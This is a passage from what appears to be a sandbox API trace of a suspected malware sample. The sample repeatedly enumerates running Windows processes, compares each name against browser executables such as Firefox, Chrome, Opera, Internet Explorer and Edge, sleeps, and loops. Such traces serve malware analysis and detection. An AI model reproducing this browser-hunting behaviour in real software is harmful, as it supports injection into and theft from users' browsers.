lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0179.047] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0179.047] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.047] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.048] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0179.048] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0179.048] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0179.048] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0179.048] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.048] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0179.048] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0179.048] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0179.048] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0179.048] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0179.049] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.049] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.049] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0179.049] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0179.049] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0179.049] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0179.049] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.049] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0179.050] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0179.050] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0179.050] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0179.050] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0179.050] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.050] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.050] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0179.050] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0179.050] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0179.050] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0179.050] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.050] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0179.051] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0179.051] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0179.051] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0179.051] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0179.051] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.051] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0179.051] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0179.051] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0179.051] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0179.051] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0179.051] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.052] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0179.052] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0179.052] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0179.052] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0179.052] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0179.052] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0179.052] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0179.053] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0179.053] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0179.053] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0179.053] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0179.053] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.053] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0179.053] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0179.053] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0179.053] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0179.053] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0179.053] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.053] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0179.054] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0179.054] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0179.054] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0179.054] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0179.054] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.054] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0179.054] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0179.054] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0179.054] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0179.054] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0179.054] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0179.054] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0179.055] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0179.055] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0179.055] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0179.055] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0179.055] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0179.055] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0179.056] CloseHandle (hObject=0xe8) returned 1 [0179.056] Sleep (dwMilliseconds=0x3e8) [0180.064] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0180.065] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.066] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0180.066] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0180.066] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0180.066] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0180.066] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0180.066] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0180.067] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0180.067] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0180.067] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0180.067] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0180.067] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0180.067] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0180.067] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0180.067] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0180.067] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0180.067] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0180.067] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.067] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0180.068] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0180.068] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0180.068] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0180.068] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0180.068] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.068] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0180.068] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0180.068] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0180.068] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0180.068] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0180.068] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.068] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0180.069] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0180.069] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0180.069] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0180.069] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0180.069] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.069] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0180.069] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0180.069] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0180.070] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0180.070] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0180.070] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.070] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0180.070] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0180.070] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0180.070] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0180.070] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0180.070] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.070] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0180.071] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0180.071] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0180.071] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0180.071] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0180.071] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.071] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0180.071] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0180.071] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0180.071] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0180.071] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0180.071] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.071] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.072] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0180.072] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0180.072] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0180.072] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0180.072] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.072] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.072] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0180.072] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0180.072] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0180.073] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0180.073] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.073] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.073] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0180.073] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0180.073] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0180.073] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0180.073] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.073] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.074] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0180.074] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0180.074] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0180.074] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0180.074] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.074] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.074] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0180.074] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0180.074] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0180.074] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0180.074] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.074] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0180.075] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0180.075] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0180.075] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0180.075] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0180.075] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.075] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.075] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0180.075] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0180.075] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0180.075] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0180.075] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.075] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.076] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0180.076] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0180.076] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0180.076] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0180.076] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.076] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0180.077] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0180.077] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0180.077] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0180.077] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0180.077] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0180.077] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0180.077] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0180.077] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0180.077] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0180.077] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0180.077] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.077] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0180.078] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0180.078] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0180.078] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0180.078] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0180.078] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.078] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.078] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0180.078] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0180.078] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0180.078] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0180.078] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.078] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0180.079] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0180.079] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0180.079] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0180.079] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0180.079] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0180.079] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, 